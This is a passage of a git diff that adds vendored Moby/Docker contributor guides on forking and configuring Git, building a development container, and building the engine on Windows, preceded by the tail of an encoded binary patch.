zqLX=eEfVkD>#x{Wp>_Qv8COI5g1D`X-*Zggo~sNdf_qM2eUem8Oc>|>R)l%MPo-=@
z<=1>KMn_G5=(fkk1Zz8*EwvyX9==dX-6QVM`#AQde4ON$);Ovv<zts;BRRf18(=sP
zDyQW-F+=obxViM>g3Uu!vB2Dtn#U!%cseRjUy1nHSBP%A#;rR<gei+fWUUjmhW2d6
ze*c<iopfPS)`upu<rv`=X2W$$@b3lY1z^h-9-4trPIDOY_pQ>vA+y_XOX--#`ZUQ^
zY@sy{%r`uM(RFf$)P*Jw5;Fhhm1OpJ_89%9NksM)>bmagq_bVTiGmVjD``^_lrvMd
zgVzF;_{UYabNg$F{5wBkFvV;A_NozhTcnAc2i;#tg!9Qi$+n-tt1jtNjf!%McbhGm
zI+7lH;w--q^wxdm>rRRf9ZaoFaNO)FR@^|G@A7i?@;CWA%igxoFr?q{`2D$Ue*c9*
zR&2iU{MC%(uN=VXF_@=N3CD;?4b$B&n8fDGfL`*t>o|rlw6ZPMhfYB*5c#pjke160
z`_d-ipH5UkFyp1&2X)U#PXe9%_1Dsgu>$uU-m~jO9$WA0pRCLQuu&mFO8EowK}?#f
zJc`PjSc2ibK;5=jgT@2t@MZlBo_Ato6i#yz#t|?sF2miOHD5B%Zck*z<s`yQ<7#^a
zRV1GmO(@s3*&4*)J8VuIqWt9U$lMMC?CL6KbsBO4TN%#?>8GRNjS^BBX83QE`$D`<
zmW3Uap`rcOC_;9gu<;DhsR!5gYxGb|dk?-7N?Zc=>5JLP{b<+@@#gIGt3=WQBw~WE
z@;Q!O=8n}vlVLiY92-^aw!+~Y6|9O7jq+1bA%$%r(kVHxh3=f#_H#JcP1+Nq_v@0E
zuCYkBpfilv3?wW;p<e`B2eDtj`5G!{1j=!_ew6PG_)M>-#)PVzYG@ySx4L_3;|c@t
z7tV|83v+D*8vH$U%`Yhz*&D7V4#MfE-f<hRW@te!jH<}tByR34b|0nG{!7Oz2;cGg
zeX6V*>HI)}@i$xfEO}w@o7hh=>oK?#5j{=Bl${8#tz=ELvt*WU+?EF`yIpcKO$Z{V
z$+Vjq4n-#lZ2jk&&N0f}bUmk%mTD?U$eQG^3g60>k-0NBftL?3;K>qCmEV+o{vfR#
z=4b`07Z?MbZ-C)*=OT7QNK<)Etg=okF_ynMiN9bQ8H}l9U1OoU`lTX()I4htEc8{!
zfW&7UyzvTqBuSTSqDjJ?jJ@|AvY&V<jiGj%`f)o;!Eb0U#AHLpWeJhCyD#tjjKSvq
zKxFQHw?^sK^nu}g2W{<^N9rKW!BoHWts+PxAwEQ;V~|Rfsqhpq@&PDeu;P2%ui^t%
zeAp3Y%AArUGVRBhjgAJ1)Hqc>Z3D)``bwdR3Kbk*cf-FIc|5FW_cD>oDOg2-;K$^j
za^5&KY|LN9G)^R6*2U-4i2njlc<`G~A0%9>?gdHsfQ88qW4o_#3&=~%pQRRr7($Tg
zlPp*34>g@=8V9F`P~e>6OE4$nGOE`TK#6u}Jl$ETLjjjG{5pWq3b?m}+iD)nw@j2S
z40Nl%4IHeR`D@Xk=v|ErT2L!uDSNVwFp_D-()cwq<SIoAs}Jj#to-kgm6Ax0rBK(u
z>`HKQ&Y+oMfh_M^Ws;X}U&|;h7Ae}V(#>z3URGwi0h3@OP<_zRagZWD_5p}1ZLS18
zON~92_w{tZrKHEx^15wLWIR6@5`^g|`9x*Dexc6Z{7CxxF{L&k7MAwhvwD%~y6so5
z$Gbcj^HvY^1e32lzi}~dVj%IG<%5sp5mH!K5mIX&UriUzbX2fBH%eooL}Ot=|Ni-^
z%mi)u^_r>j#~**}fIbp@=+D<VX7GDp0q%di!WWz?ti$oZR<hu|8voE;c5ZCwkUr=Y
zx!?|7v2;$(P<ZmzlkLD`0Q{()d{iDe_!Y@@a)p0x|Ko7v0(7|h|C!SOi5KW>f1Li$
zPyKl{Ah`v8er?Y@xxkZ4_;dR|PV)^q{^Y%X-t3=;tNy=r8mQ?5QU88Z&=Z{h_nZ2^
zd>W$vjjQ?DS^jK#ojK+hCh0TKBcjJR$%bOPBdEadzq?-(=nsD$ezHAK>EGLC7dqR&
zUri<jIOM-v&3|@3`hP#oNfQIdIq>u6RsP-m$bN1A$7w2|<A2{F^!v&2|GXL&u=)4*
z6guSR>Hl$>O{fq2|I_>*Z=1d@rd&8Vo(283gD)9{1qTS@Uj^T&F+?a;9Oji7ywJ3|
zDO_*O8iCiDIfc(0a?t;RMFV<7zsF+UKmIuBPbWK&KL_2ubI@@7--c@FUGSe>>Eu=8
zpA*AtXoUXfCg>gioGVuU$EK5E{MVJ`TR^*Wpds_;YhZyWnNpPSQ_5!D0rX9n%E@t$
z`U-k?{BAwq)YsqE89?6}5pz0u3o=rht0hgTOQo-UgY)DHY3R|4M9JD*zxI1;bE#ys
z7bK5g{QE-#UH|yF-yiyOn$jhLuH)CG{m*tfnW9eGj1v9xCjU4T*++FU3;cQa+FT(*
zwCD{3t6y)jiqQp^#&PNA#pJK<_nrT!(svWw&Z_oY_o4scYB+QOlxQ<ca9^dyvS`!$
zVU}$poinbrUDf(kypxpB{+zD-*6G9sKWP|w{m`9;v4huNQ8O$wU=OlSGP^tfz16zg
z_tjlta{=*@y0MyR!!dn6=zZE;$0~C^GR!+g{R>xDBm=OsQ*H|zKYmgU?NqynQZ7-n
Hxck2V))LuH

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md b/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md
new file mode 100644
index 0000000000..3d56c0b8c7
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md
@@ -0,0 +1,372 @@
+### Work with a development container
+
+In this section, you learn to develop like the Moby Engine core team.
+The `moby/moby` repository includes a `Dockerfile` at its root. This file defines
+Moby's development environment. The `Dockerfile` lists the environment's
+dependencies: system libraries and binaries, Go environment, Go dependencies,
+etc.
+
+Moby's development environment is itself, ultimately a Docker container.
+You use the `moby/moby` repository and its `Dockerfile` to create a Docker image,
+run a Docker container, and develop code in the container.
+
+If you followed the procedures that [set up Git for contributing](./set-up-git.md), you should have a fork of the `moby/moby`
+repository. You also created a branch called `dry-run-test`. In this section,
+you continue working with your fork on this branch.
+
+##  Task 1. Remove images and containers
+
+Moby developers run the latest stable release of the Docker software. They clean their local hosts of
+unnecessary Docker artifacts such as stopped containers or unused images.
+Cleaning unnecessary artifacts isn't strictly necessary, but it is good
+practice, so it is included here.
+
+To remove unnecessary artifacts:
+
+1. Verify that you have no unnecessary containers running on your host.
+
+   ```none
+   $ docker ps -a
+   ```
+
+   You should see something similar to the following:
+
+   ```none
+   CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
+   ```
+
+   There are no running or stopped containers on this host. A fast way to
+   remove old containers is the following:
+
+   You can now use the `docker system prune` command to achieve this:
+
+   ```none
+   $ docker system prune -a
+   ```
+
+   Older versions of the Docker Engine should reference the command below:
+
+   ```none
+   $ docker rm $(docker ps -a -q)
+   ```
+
+   This command uses `docker ps` to list all containers (`-a` flag) by numeric
+   IDs (`-q` flag). Then, the `docker rm` command removes the resulting list.
+   If you have running but unused containers, stop and then remove them with
+   the `docker stop` and `docker rm` commands.
+
+2. Verify that your host has no dangling images.
+
+   ```none
+   $ docker images
+   ```
+
+   You should see something similar to the following:
+
+   ```none
+   REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+   ```
+
+   This host has no images. You may have one or more _dangling_ images. A
+   dangling image is not used by a running container and is not an ancestor of
+   another image on your system. A fast way to remove dangling image is
+   the following:
+
+   ```none
+   $ docker rmi -f $(docker images -q -a -f dangling=true)
+   ```
+
+   This command uses `docker images` to list all images (`-a` flag) by numeric
+   IDs (`-q` flag) and filter them to find dangling images (`-f dangling=true`).
+   Then, the `docker rmi` command forcibly (`-f` flag) removes
+   the resulting list. If you get a "docker: "rmi" requires a minimum of 1 argument."
+   message, that means there were no dangling images. To remove just one image, use the
+   `docker rmi ID` command.
+
+## Task 2. Start a development container
+
+If you followed the last procedure, your host is clean of unnecessary images and
+containers. In this section, you build an image from the Engine development
+environment and run it in the container. Both steps are automated for you by the
+Makefile in the Engine code repository. The first time you build an image, it
+can take over 15 minutes to complete.
+
+1. Open a terminal.
+
+   For [Docker Toolbox](https://github.com/docker/toolbox) users, use `docker-machine status your_vm_name` to make sure your VM is running. You
+   may need to run `eval "$(docker-machine env your_vm_name)"` to initialize your
+   shell environment. If you use Docker for Mac or Docker for Windows, you do not need
+   to use Docker Machine.
+
+2. Change into the root of the `moby-fork` repository.
+
+   ```none
+   $ cd ~/repos/moby-fork
+   ```
+
+   If you are following along with this guide, you created a `dry-run-test`
+   branch when you [set up Git for contributing](./set-up-git.md).
+
+3. Ensure you are on your `dry-run-test` branch.
+
+   ```none
+   $ git checkout dry-run-test
+   ```
+
+   If you get a message that the branch doesn't exist, add the `-b` flag (`git checkout -b dry-run-test`) so the
+   command both creates the branch and checks it out.
+
+4. Use `make` to build a development environment image and run it in a container.
+
+   ```none
+   $ make BIND_DIR=. shell
+   ```
+
+   Using the instructions in the
+   `Dockerfile`, the build may need to download and / or configure source and other images. On first build this process may take between 5 - 15 minutes to create an image. The command returns informational messages as it runs.  A
+   successful build returns a final message and opens a Bash shell into the
+   container.
+
+   ```none
+   Successfully built 3d872560918e
+   Successfully tagged docker-dev:dry-run-test
+   docker run --rm -i --privileged -e BUILDFLAGS -e KEEPBUNDLE -e DOCKER_BUILD_GOGC -e DOCKER_BUILD_PKGS -e DOCKER_CLIENTONLY -e DOCKER_DEBUG -e DOCKER_EXPERIMENTAL -e DOCKER_GITCOMMIT -e DOCKER_GRAPHDRIVER=devicemapper -e DOCKER_INCREMENTAL_BINARY -e DOCKER_REMAP_ROOT -e DOCKER_STORAGE_OPTS -e DOCKER_USERLANDPROXY -e TESTDIRS -e TESTFLAGS -e TIMEOUT -v "home/ubuntu/repos/docker/bundles:/go/src/github.com/docker/docker/bundles" -t "docker-dev:dry-run-test" bash
+   #
+   ```
+
+   At this point, your prompt reflects the container's BASH shell.
+
+5. List the contents of the current directory (`/go/src/github.com/docker/docker`).
+
+   You should see the image's source from the  `/go/src/github.com/docker/docker`
+   directory.
+
+   ![List example](images/list_example.png)
+
+6. Make a `dockerd` binary.
+
+   ```none
+   # hack/make.sh binary
+   Removing bundles/
+
+   ---> Making bundle: binary (in bundles/binary)
+   Building: bundles/binary-daemon/dockerd-17.06.0-dev
+   Created binary: bundles/binary-daemon/dockerd-17.06.0-dev
+   Copying nested executables into bundles/binary-daemon
+
+   ```
+
+7. Run `make install`, which copies the binary to the container's
+   `/usr/local/bin/` directory.
+
+   ```none
+   # make install
+   ```
+
+8. Start the Engine daemon running in the background.
+
+   ```none
+   # dockerd -D &
+   ...output snipped...
+   DEBU[0001] Registering POST, /networks/{id:.*}/connect
+   DEBU[0001] Registering POST, /networks/{id:.*}/disconnect
+   DEBU[0001] Registering DELETE, /networks/{id:.*}
+   INFO[0001] API listen on /var/run/docker.sock
+   DEBU[0003] containerd connection state change: READY
+   ```
+
+   The `-D` flag starts the daemon in debug mode. The `&` starts it as a
+   background process. You'll find these options useful when debugging code
+   development. You will need to hit `return` in order to get back to your shell prompt.
+
+   > **Note**: The following command automates the `build`,
+   > `install`, and `run` steps above. Once the command below completes, hit `ctrl-z` to suspend the process, then run `bg 1` and hit `enter` to resume the daemon process in the background and get back to your shell prompt.
+
+   ```none
+   hack/make.sh binary install-binary run
+   ```
+
+9. Inside your container, check your Docker versions:
+
+   ```none
+   # docker version
+   Client:
+    Version:      17.06.0-ce
+    API version:  1.30
+    Go version:   go1.8.3
+    Git commit:   02c1d87
+    Built:        Fri Jun 23 21:15:15 2017
+    OS/Arch:      linux/amd64
+
+   Server:
+    Version:      dev
+    API version:  1.35 (minimum version 1.12)
+    Go version:   go1.9.2
+    Git commit:   4aa6362da
+    Built:        Sat Dec  2 05:22:42 2017
+    OS/Arch:      linux/amd64
+    Experimental: false
+   ```
+
+   Notice the split versions between client and server, which might be
+   unexpected. In more recent times the Docker CLI component (which provides the
+   `docker` command) has split out from the Moby project and is now maintained in:
+   
+   * [docker/cli](https://github.com/docker/cli) - The Docker CLI source-code;
+   * [docker/docker-ce](https://github.com/docker/docker-ce) - The Docker CE
+     edition project, which assembles engine, CLI and other components.
+   
+   The Moby project now defaults to a [fixed
+   version](https://github.com/docker/docker-ce/commits/v17.06.0-ce) of the
+   `docker` CLI for integration tests.
+
+   You may have noticed the following message when starting the container with the `shell` command:
+   
+   ```none
+   Makefile:123: The docker client CLI has moved to github.com/docker/cli. For a dev-test cycle involving the CLI, run:
+   DOCKER_CLI_PATH=/host/path/to/cli/binary make shell
+   then change the cli and compile into a binary at the same location.
+   ```
+
+   By setting `DOCKER_CLI_PATH` you can supply a newer `docker` CLI to the
+   server development container for testing and for `integration-cli`
+   test-execution:
+
+   ```none
+   make DOCKER_CLI_PATH=/home/ubuntu/git/docker-ce/components/packaging/static/build/linux/docker/docker BIND_DIR=. shell
+   ...
+   # which docker
+   /usr/local/cli/docker
+   # docker --version
+   Docker version 17.09.0-dev, build 
+   ```
+
+    This Docker CLI should be built from the [docker-ce
+    project](https://github.com/docker/docker-ce) and needs to be a Linux
+    binary.
+
+   Inside the container you are running a development version. This is the version
+   on the current branch. It reflects the value of the `VERSION` file at the
+   root of your `docker-fork` repository.
+
+10. Run the `hello-world` image.
+
+    ```none
+    # docker run hello-world
+    ```
+
+11. List the image you just downloaded.
+
+    ```none
+    # docker images
+	REPOSITORY   TAG     IMAGE ID      CREATED        SIZE
+	hello-world  latest  c54a2cc56cbb  3 months ago   1.85 kB
+    ```
+
+12. Open another terminal on your local host.
+
+13. List the container running your development container.
+
+    ```none
+    ubuntu@ubuntu1404:~$ docker ps
+    CONTAINER ID        IMAGE                     COMMAND             CREATED             STATUS              PORTS               NAMES
+    a8b2885ab900        docker-dev:dry-run-test   "hack/dind bash"    43 minutes ago      Up 43 minutes                           hungry_payne
+    ```
+
+    Notice that the tag on the container is marked with the `dry-run-test` branch name.
+
+
+## Task 3. Make a code change
+
+At this point, you have experienced the "Moby inception" technique. That is,
+you have:
+
+* forked and cloned the Moby Engine code repository
+* created a feature branch for development
+* created and started an Engine development container from your branch
+* built a binary inside of your development container
+* launched a `docker` daemon using your newly compiled binary
+* called the `docker` client to run a `hello-world` container inside
+  your development container
+
+Running the `make BIND_DIR=. shell` command mounted your local Docker repository source into
+your Docker container.
+
+   > **Note**: Inspecting the `Dockerfile` shows a `COPY . /go/src/github.com/docker/docker` instruction, suggesting that dynamic code changes will _not_ be reflected in the container. However inspecting the `Makefile` shows that the current working directory _will_ be mounted via a `-v` volume mount.
+
+When you start to develop code though, you'll
+want to iterate code changes and builds inside the container. If you have
+followed this guide exactly, you have a bash shell running a development
+container.
+
+Try a simple code change and see it reflected in your container. For this
+example, you'll edit the help for the `attach` subcommand.
+
+1. If you don't have one, open a terminal in your local host.
+
+2. Make sure you are in your `moby-fork` repository.
+
+   ```none
+   $ pwd
+   /Users/mary/go/src/github.com/moxiegirl/moby-fork
+   ```
+
+   Your location should be different because, at least, your username is
+   different.
+
+3. Open the `cmd/dockerd/docker.go` file.
+
+4. Edit the command's help message.
+
+   For example, you can edit this line:
+
+   ```go
+   Short:         "A self-sufficient runtime for containers.",
+   ```
+
+   And change it to this:
+
+   ```go
+   Short:         "A self-sufficient and really fun runtime for containers.",
+   ```
+
+5. Save and close the `cmd/dockerd/docker.go` file.
+
+6. Go to your running docker development container shell.
+
+7. Rebuild the binary by using the command `hack/make.sh binary` in the docker development container shell.
+
+8. Stop Docker if it is running.
+
+9. Copy the binaries to **/usr/bin** by entering the following commands in the docker development container shell.
+
+   ```
+   hack/make.sh binary install-binary
+   ```
+
+10. To view your change, run the `dockerd --help` command in the docker development container shell.
+
+   ```bash
+   # dockerd --help
+
+   Usage:        dockerd COMMAND
+
+   A self-sufficient and really fun runtime for containers.
+
+   Options:
+   ...
+
+   ```
+
+You've just done the basic workflow for changing the Engine code base. You made
+your code changes in your feature branch. Then, you updated the binary in your
+development container and tried your change out. If you were making a bigger
+change, you might repeat or iterate through this flow several times.
+
+## Where to go next
+
+Congratulations, you have successfully achieved Docker inception. You've had a
+small experience of the development process. You've set up your development
+environment and verified almost all the essential processes you need to
+contribute. Of course, before you start contributing, [you'll need to learn one
+more piece of the development process, the test framework](test.md).
diff --git a/vendor/github.com/docker/docker/docs/contributing/set-up-git.md b/vendor/github.com/docker/docker/docs/contributing/set-up-git.md
new file mode 100644
index 0000000000..f320c2716c
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/contributing/set-up-git.md
@@ -0,0 +1,280 @@
+### Configure Git for contributing
+
+Work through this page to configure Git and a repository you'll use throughout
+the Contributor Guide. The work you do further in the guide, depends on the work
+you do here.
+
+## Task 1. Fork and clone the Moby code
+
+Before contributing, you first fork the Moby code repository. A fork copies
+a repository at a particular point in time. GitHub tracks for you where a fork
+originates.
+
+As you make contributions, you change your fork's code. When you are ready,
+you make a pull request back to the original Docker repository. If you aren't
+familiar with this workflow, don't worry, this guide walks you through all the
+steps.
+
+To fork and clone Moby:
+
+1. Open a browser and log into GitHub with your account.
+
+2. Go to the <a href="https://github.com/moby/moby"
+target="_blank">moby/moby repository</a>.
+
+3. Click the "Fork" button in the upper right corner of the GitHub interface.
+
+    ![Branch Signature](images/fork_docker.png)
+
+    GitHub forks the repository to your GitHub account. The original
+    `moby/moby` repository becomes a new fork `YOUR_ACCOUNT/moby` under
+    your account.
+
+4. Copy your fork's clone URL from GitHub.
+
+    GitHub allows you to use HTTPS or SSH protocols for clones. You can use the
+    `git` command line or clients like Subversion to clone a repository.
+
+    ![Copy clone URL](images/copy_url.png)
+
+    This guide assume you are using the HTTPS protocol and the `git` command
+    line. If you are comfortable with SSH and some other tool, feel free to use
+    that instead. You'll need to convert what you see in the guide to what is
+    appropriate to your tool.
+
+5. Open a terminal window on your local host and change to your home directory.
+
+   ```bash
+   $ cd ~
+   ```
+
+    In Windows, you'll work in your Docker Quickstart Terminal window instead of
+    Powershell or a `cmd` window.
+
+6. Create a `repos` directory.
+
+   ```bash
+   $ mkdir repos
+   ```
+
+7. Change into your `repos` directory.
+
+   ```bash
+   $ cd repos
+   ```
+
+8. Clone the fork to your local host into a repository called `moby-fork`.
+
+   ```bash
+   $ git clone https://github.com/moxiegirl/moby.git moby-fork
+   ```
+
+    Naming your local repo `moby-fork` should help make these instructions
+    easier to follow; experienced coders don't typically change the name.
+
+9. Change directory into your new `moby-fork` directory.
+
+   ```bash
+   $ cd moby-fork
+   ```
+
+    Take a moment to familiarize yourself with the repository's contents. List
+    the contents.
+
+## Task 2. Set your signature and an upstream remote
+
+When you contribute to Docker, you must certify you agree with the
+<a href="http://developercertificate.org/" target="_blank">Developer Certificate of Origin</a>.
+You indicate your agreement by signing your `git` commits like this:
+
+```
+Signed-off-by: Pat Smith <pat.smith@email.com>
+```
+
+To create a signature, you configure your username and email address in Git.
+You can set these globally or locally on just your `moby-fork` repository.
+You must sign with your real name. You can sign your git commit automatically
+with `git commit -s`. Moby does not accept anonymous contributions or contributions
+through pseudonyms.
+
+As you change code in your fork, you'll want to keep it in sync with the changes
+others make in the `moby/moby` repository. To make syncing easier, you'll
+also add a _remote_ called `upstream` that points to `moby/moby`. A remote
+is just another project version hosted on the internet or network.
+
+To configure your username, email, and add a remote:
+
+1. Change to the root of your `moby-fork` repository.
+
+   ```bash
+   $ cd moby-fork
+   ```
+
+2. Set your `user.name` for the repository.
+
+   ```bash
+   $ git config --local user.name "FirstName LastName"
+   ```
+
+3. Set your `user.email` for the repository.
+
+   ```bash
+   $ git config --local user.email "emailname@mycompany.com"
+   ```
+
+4. Set your local repo to track changes upstream, on the `moby/moby` repository.
+
+   ```bash
+   $ git remote add upstream https://github.com/moby/moby.git
+   ```
+
+5. Check the result in your `git` configuration.
+
+   ```bash
+   $ git config --local -l
+   core.repositoryformatversion=0
+   core.filemode=true
+   core.bare=false
+   core.logallrefupdates=true
+   remote.origin.url=https://github.com/moxiegirl/moby.git
+   remote.origin.fetch=+refs/heads/*:refs/remotes/origin/*
+   branch.master.remote=origin
+   branch.master.merge=refs/heads/master
+   user.name=Mary Anthony
+   user.email=mary@docker.com
+   remote.upstream.url=https://github.com/moby/moby.git
+   remote.upstream.fetch=+refs/heads/*:refs/remotes/upstream/*
+   ```
+
+	To list just the remotes use:
+
+   ```bash
+   $ git remote -v
+   origin	https://github.com/moxiegirl/moby.git (fetch)
+   origin	https://github.com/moxiegirl/moby.git (push)
+   upstream https://github.com/moby/moby.git (fetch)
+   upstream https://github.com/moby/moby.git (push)
+   ```
+
+## Task 3. Create and push a branch
+
+As you change code in your fork, make your changes on a repository branch.
+The branch name should reflect what you are working on. In this section, you
+create a branch, make a change, and push it up to your fork.
+
+This branch is just for testing your config for this guide. The changes are part
+of a dry run, so the branch name will be dry-run-test. To create and push
+the branch to your fork on GitHub:
+
+1. Open a terminal and go to the root of your `moby-fork`.
+
+   ```bash
+   $ cd moby-fork
+   ```
+
+2. Create a `dry-run-test` branch.
+
+   ```bash
+   $ git checkout -b dry-run-test
+   ```
+
+    This command creates the branch and switches the repository to it.
+
+3. Verify you are in your new branch.
+
+   ```bash
+   $ git branch
+   * dry-run-test
+     master
+   ```
+
+    The current branch has an * (asterisk) marker. So, these results show you
+    are on the right branch.
+
+4. Create a `TEST.md` file in the repository's root.
+
+   ```bash
+   $ touch TEST.md
+   ```
+
+5. Edit the file and add your email and location.
+
+    ![Add your information](images/contributor-edit.png)
+
+    You can use any text editor you are comfortable with.
+
+6. Save and close the file.
+
+7. Check the status of your branch.
+
+   ```bash
+   $ git status
+   On branch dry-run-test
+   Untracked files:
+     (use "git add <file>..." to include in what will be committed)
+
+       TEST.md
+
+   nothing added to commit but untracked files present (use "git add" to track)
+   ```
+
+	You've only changed the one file. It is untracked so far by git.
+
+8. Add your file.
+
+   ```bash
+   $ git add TEST.md
+   ```
+
+    That is the only _staged_ file. Stage is fancy word for work that Git is
+    tracking.
+
+9. Sign and commit your change.
+
+   ```bash
+   $ git commit -s -m "Making a dry run test."
+   [dry-run-test 6e728fb] Making a dry run test
+    1 file changed, 1 insertion(+)
+    create mode 100644 TEST.md
+   ```
+
+    Commit messages should have a short summary sentence of no more than 50
+    characters. Optionally, you can also include a more detailed explanation
+    after the summary. Separate the summary from any explanation with an empty
+    line.
+
+10. Push your changes to GitHub.
+
+    ```bash
+    $ git push --set-upstream origin dry-run-test
+    Username for 'https://github.com': moxiegirl
+    Password for 'https://moxiegirl@github.com':
+    ```
+
+    Git prompts you for your GitHub username and password. Then, the command
+    returns a result.
+
+    ```bash
+    Counting objects: 13, done.
+    Compressing objects: 100% (2/2), done.
+    Writing objects: 100% (3/3), 320 bytes | 0 bytes/s, done.
+    Total 3 (delta 1), reused 0 (delta 0)
+    To https://github.com/moxiegirl/moby.git
+     * [new branch]      dry-run-test -> dry-run-test
+    Branch dry-run-test set up to track remote branch dry-run-test from origin.
+    ```
+
+11. Open your browser to GitHub.
+
+12. Navigate to your Moby fork.
+
+13. Make sure the `dry-run-test` branch exists, that it has your commit, and the
+commit is signed.
+
+    ![Branch Signature](images/branch-sig.png)
+
+## Where to go next
+
+Congratulations, you have finished configuring both your local host environment
+and Git for contributing. In the next section you'll [learn how to set up and
+work in a Moby development container](set-up-dev-env.md).
diff --git a/vendor/github.com/docker/docker/docs/contributing/software-req-win.md b/vendor/github.com/docker/docker/docs/contributing/software-req-win.md
new file mode 100644
index 0000000000..3070d34e83
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/contributing/software-req-win.md
@@ -0,0 +1,177 @@
+### Build and test Moby on Windows
+
+This page explains how to get the software you need to build, test, and run the
+Moby source code for Windows and setup the required software and services:
+
+- Windows containers
+- GitHub account
+- Git
+
+## Prerequisites
+
+### 1. Windows Server 2016 or Windows 10 with all Windows updates applied
+
+The major build number must be at least 14393. This can be confirmed, for example,
+by running the following from an elevated PowerShell prompt - this sample output
+is from a fully up to date machine as at mid-November 2016:
+
+
+    PS C:\> $(gin).WindowsBuildLabEx
+    14393.447.amd64fre.rs1_release_inmarket.161102-0100
+
+### 2. Git for Windows (or another git client) must be installed
+
+https://git-scm.com/download/win.
+
+### 3. The machine must be configured to run containers
+
+For example, by following the quick start guidance at
+https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start or https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md
+
+### 4. If building in a Hyper-V VM
+
+For Windows Server 2016 using Windows Server containers as the default option,
+it is recommended you have at least 1GB of memory assigned;
+For Windows 10 where Hyper-V Containers are employed, you should have at least
+4GB of memory assigned.
+Note also, to run Hyper-V containers in a VM, it is necessary to configure the VM
+for nested virtualization.
+
+## Usage
+
+The following steps should be run from an elevated Windows PowerShell prompt.
+
+>**Note**:  In a default installation of containers on Windows following the quick-start guidance at https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start,
+the `docker.exe` client must run elevated to be able to connect to the daemon).
+
+### 1. Windows containers
+
+To test and run the Windows Moby engine, you need a system that supports Windows Containers:
+
+- Windows 10 Anniversary Edition
+- Windows Server 2016 running in a VM, on bare metal or in the cloud
+
+Check out the [getting started documentation](https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md) for details.
+
+### 2. GitHub account
+
+To contribute to the Docker project, you need a <a href="https://github.com" target="_blank">GitHub account</a>.
+A free account is fine. All the Moby project repositories are public and visible to everyone.
+
+This guide assumes that you have basic familiarity with Git and Github terminology
+and usage.
+Refer to [GitHub For Beginners: Don’t Get Scared, Get Started](http://readwrite.com/2013/09/30/understanding-github-a-journey-for-beginners-part-1/)
+to get up to speed on Github.
+
+### 3. Git
+
+In PowerShell, run:
+
+    Invoke-Webrequest "https://github.com/git-for-windows/git/releases/download/v2.7.2.windows.1/Git-2.7.2-64-bit.exe" -OutFile git.exe -UseBasicParsing
+    Start-Process git.exe -ArgumentList '/VERYSILENT /SUPPRESSMSGBOXES /CLOSEAPPLICATIONS /DIR=c:\git\' -Wait
+    setx /M PATH "$env:Path;c:\git\cmd"
+
+You are now ready clone and build the Moby source code.
+
+### 4. Clone Moby
+
+In a new (to pick up the path change) PowerShell prompt, run:
+
+    git clone https://github.com/moby/moby
+    cd moby
+
+This clones the main Moby repository. Check out [Moby Project](https://mobyproject.org)
+to learn about the other software that powers the Moby platform.
+
+### 5. Build and run
+
+Create a builder-container with the Moby source code. You can change the source
+code on your system and rebuild any time:
+
+    docker build -t nativebuildimage -f .\Dockerfile.windows .
+    docker build -t nativebuildimage -f Dockerfile.windows -m 2GB .  # (if using Hyper-V containers)
+
+To build Moby, run:
+
+    $DOCKER_GITCOMMIT=(git rev-parse --short HEAD)
+    docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT nativebuildimage hack\make.ps1 -Binary
+    docker run --name binaries -e DOCKER_GITCOMMIT=$DOCKER_GITCOMMIT -m 2GB nativebuildimage hack\make.ps1 -Binary  # (if using Hyper-V containers)
+
+Copy out the resulting Windows Moby Engine binary to `dockerd.exe` in the
+current directory:
+
+    docker cp binaries:C:\go\src\github.com\docker\docker\bundles\docker.exe docker.exe
+    docker cp binaries:C:\go\src\github.com\docker\docker\bundles\dockerd.exe dockerd.exe
+
+To test it, stop the system Docker daemon and start the one you just built:
+
+    Stop-Service Docker
+    .\dockerd.exe -D
+
+The other make targets work too, to run unit tests try:
+`docker run --rm docker-builder sh -c 'cd /c/go/src/github.com/docker/docker; hack/make.sh test-unit'`.
+
+### 6. Remove the interim binaries container
+
+_(Optional)_
+
+    docker rm binaries
+
+### 7. Remove the image
+
+_(Optional)_
+
+It may be useful to keep this image around if you need to build multiple times.
+Then you can take advantage of the builder cache to have an image which has all
+the components required to build the binaries already installed.
+
+    docker rmi nativebuildimage
+
+## Validation
+
+The validation tests can only run directly on the host.
+This is because they calculate information from the git repo, but the .git directory
+is not passed into the image as it is excluded via `.dockerignore`.
+Run the following from a Windows PowerShell prompt (elevation is not required):
+(Note Go must be installed to run these tests)
+
+    hack\make.ps1 -DCO -PkgImports -GoFormat
+
+## Unit tests
+
+To run unit tests, ensure you have created the nativebuildimage above.
+Then run one of the following from an (elevated) Windows PowerShell prompt:
+
+    docker run --rm nativebuildimage hack\make.ps1 -TestUnit
+    docker run --rm -m 2GB nativebuildimage hack\make.ps1 -TestUnit  # (if using Hyper-V containers)
+
+To run unit tests and binary build, ensure you have created the nativebuildimage above.
+Then run one of the following from an (elevated) Windows PowerShell prompt:
+
+    docker run nativebuildimage hack\make.ps1 -All
+    docker run -m 2GB nativebuildimage hack\make.ps1 -All  # (if using Hyper-V containers)
+
+## Windows limitations
+
+Don't attempt to use a bind mount to pass a local directory as the bundles
+target directory.
+It does not work (golang attempts for follow a mapped folder incorrectly).
+Instead, use docker cp as per the example.
+
+`go.zip` is not removed from the image as it is used by the Windows CI servers
+to ensure the host and image are running consistent versions of go.
+
+Nanoserver support is a work in progress. Although the image will build if the
+`FROM` statement is updated, it will not work when running autogen through `hack\make.ps1`.
+It is suspected that the required GCC utilities (eg gcc, windres, windmc) silently
+quit due to the use of console hooks which are not available.
+
+The docker integration tests do not currently run in a container on Windows,
+predominantly due to Windows not supporting privileged mode, so anything using a volume would fail.
+They (along with the rest of the docker CI suite) can be run using
+https://github.com/jhowardmsft/docker-w2wCIScripts/blob/master/runCI/Invoke-DockerCI.ps1.
+
+## Where to go next
+
+In the next section, you'll [learn how to set up and configure Git for
+contributing to Moby](set-up-git.md).
diff --git a/vendor/github.com/docker/docker/docs/contributing/software-required.md b/vendor/github.com/docker/docker/docs/contributing/software-required.md
new file mode 100644
index 0000000000..b14c6f9050
--- /dev/null
